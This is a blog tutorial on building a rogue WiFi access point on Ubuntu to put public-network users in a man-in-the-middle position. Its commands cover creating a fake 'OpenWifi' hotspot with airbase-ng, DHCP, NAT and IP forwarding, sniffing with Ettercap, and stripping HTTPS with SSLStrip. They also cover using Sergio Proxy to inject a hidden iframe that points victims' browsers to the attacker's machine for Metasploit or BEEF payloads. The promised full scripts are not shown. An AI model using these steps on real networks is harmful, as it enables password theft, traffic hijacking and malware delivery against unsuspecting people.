Rogue WiFi Access point
Setup Rogue AP for MITM using Ubuntu

Very simple article to explain how to setup a man in the middle situation using a rogue WiFi access point.

Article published on 5 November 2013
last modification on 29 May 2016

by Emeric Nasi

Note: In order to understand this document you need to know basic Linux administration and networking tools.
License : Copyright Emeric Nasi, some rights reserved
This work is licensed under a Creative Commons Attribution 4.0 International License.
Creative Commons License

I. Introduction.

I know that writing "yet another rogue AP tutorial" is not very challenging but after two years I want to start with fun stuff. Hopefully you can also learn one or two things here!

Note : The commands described in this article were tested on an XUbuntu 12.04 machine, it is easy to adapt them on another system.

II. Theory

II.1 Scenario

Imagine a public space, airport, hotel, etc. A crowd of people waiting, reading.. and using the public WiFi. Imagine one of the guys in the crowd has setup his own WiFi access point with a name like FreeWifi, HotelWifi or even the same name as the real public WiFi. How long will it be before a significant part of the audience connects to his access point? And what if his access point is in fact full of spying tools and other traps?

II.2 Man In the Middle

Man In The Middle attacks occurs when a malicious individual manages to master a point of communication between his targets. In our case we can control all the communication between the public space users and the Internet.
There are several ways to gent into Man In the Middle situation (MITM) ARP spoofing or DHCP spoofing for example. For more information on MITM ARP spoofing have a look at this page.
Another MITM type is to control a WiFi access point. All the clients connected to your access point have to pass trough the machine to access to the Internet. It is the same as controlling a router. This peculiar attack cannot allow to directly target someone, instead the attacker waits for people to connect themselves. However, if a special target is in WiFi range and in a public space there are some chances that he will connect to the rogue AP. Rogue access points can be used to steal password, hijack communications, inject malwares into the victims PC.
I personnaly also see a great interest in rogue AP as it is an easy way to enlighten non specialists on threats related to WiFi security and man in the middle issue.

III. Practice

III.1 Setup WiFi Access point

The tool we will use to setup a rogue access point is airbase-ng from Aircrack toolsuit. Aircrack is not by default in Ubuntu repository, if you want to get the latest version or to learn more about Aircrack have a look at http://www.aircrack-ng.org/

A prerequisite to use most Aircrack tools is to have a Wifi card which can be passed into monitor mode. I personally use an Alfa Awus using Realtek Rtl-8187 chipset.

Warning : RTL-8187 drivers are a big issue on Ubuntu as the default provided ones does not work properly (disconnections, invisible SSID with airbase, etc). To avoid these problems I recommend you install Aircrack patched drivers or drivers provided by globalsyzygy on his blog

Starting a rogue AP is pretty simple. First we put the interface we want in monitor mode using airmon-ng. In my case wlan1. You must not be using that interface to connect to any WiFi network.
airmon-ng start wlan1

Note : You might see warning about processes that could cause trouble (NetworkManager, wpa_supplicant, dhclient, etc). This issue has an impact when using other Aircrack tools such as airodum-no and aireplay-ng but in our case we can ignore it.

Next we use airbase to create a fake Access Point called "OpenWifi" on WiFi channel 6.
airbase-ng -e OpenWifi -c 6 mon0
At this point a network interface, at0, is created for the access point.

We will now configure a DHCP server to provide a dynamic IP address to people connecting to our access point.
We use the Ubuntu default dhcp server:
dhcpd -d -f -cf dhcpd_ap.conf at0 &
Here, we use a custom dhcpd configuration file that you can find in section IV.

You should see the WiFi SSID on the available network and you should be able to connect to it from, for example, your cellphone. However it cannot be used as an Internet access point for the moment.

III.2 Provide Internet access

To provide Internet access to your AP client you need to set up routing between your AP interface and your Internet interface. In my case my network interface is my laptop native WiFi card on Wlan0. You can also use Ethernet link, cellphone or any other network interface.
For that we must transform our computer into a router.

First we use ifconfig to set an IP address and a mask to our Access Point network interface.

ifconfig at0 up
 ifconfig at0 192.168.3.1 netmask 255.255.255.0

Then, we add a route and indicate that our IP it the local network router for the access point.

route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1

Next we configure IPTable to accept routing:

iptables -P FORWARD ACCEPT
 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE 

Finally we activate IP forwarding in the kernel:
echo "1" > /proc/sys/net/ipv4/ip_forward

III.3 Exploit MITM situation

At that point you can start your access point and be thus in MITM position between your AP clients and the Internet. Now you could use any tool you want to sniff, alter, or block the traffic. I am going to present three tools that can be used when in man in the middle situation.
Sniff the network using the famous Ettercap:
xterm -bg black -fg blue -e ettercap --silent -T -q -p --log-msg  ettercap.log -i at0 // // &
Here we launch an external Ettercap terminal, important sniffed information will be displayed on the terminal and write in the ettercap.log file. In our case we do not use ettercap MITM capacity since we are already in MITM situation.
Bypass HTTPS protection using SSLStrip. This tool is used to prevent the TLS tunnel to be made between the client and the website, instead the tunnel is made between the MITM attacker and the website, the victim only receives clear-text http information. For more information have a look at this site.
First we configure iptables to intercept HTTP traffic and redirect it to port 15000:

iptables -t nat -A PREROUTING -p tcp -i at0 --destination-port 80 -j REDIRECT --to-port 15000 


Next we start SSLStrip listening on port 15000 and logging everything in SSLStrip_log.txt
sslstrip -w SSLStrip_log.txt -a -l 15000 -f &

Inject malicious HTML in the consulted web pages. For that I will use Sergio Proxy which is a very neet tool for MITM situation. Its embed SSLStrip and can allow to do all kind of injection and other attacks. You can find it here.
In my case I want to include an invisible iframe pointing on my PC on the clients browser. This attack can be used in conjunction with Metasploit, SET or BEEF to do all kind of attacks like displaying an applet that install a malicious payload, attack browser potential vulnerability, replace files downloaded by the AP client by malicious files, etc. HTML injection is very easy to use with Sergio Proxy.
As for SSLStrip we configure iptables to intercept HTTP traffic and redirect it to port 15000:
iptables -t nat -A PREROUTING -p tcp -i at0 --destination-port 80 -j REDIRECT --to-port 15000

Next we start Sergio Proxy with inject URL option that writes a size 0 IFRAME at the bottom of the two first pages visited by the AP client.

/opt/sergio-proxy/sergio-proxy.py -l 15000 --inject  --html-url "http://192.168.3.1/index" -w ${LOGS_PATH}/SSLStrip_log.txt -a -k --count-limit 2  & 

IV. Complete scripts.

IV.1 Rogue AP script

Save the next script as rogueAP.sh

This script must be launched as root and allows to start and stop your rogue access point.
Start AP:
sudo ./rogueAP.sh start

Stop AP:
sudo ./rogueAP.sh stop

IV.2 DHCP configuration

The next code describes the content of the DHCPS configuration file. This file must be called dhcpd.conf and must be located next to the rogueAP.sh script. When the rogueAP is started the DHCP file will be copied in /etc/dhcp/dhcpd_ap.conf.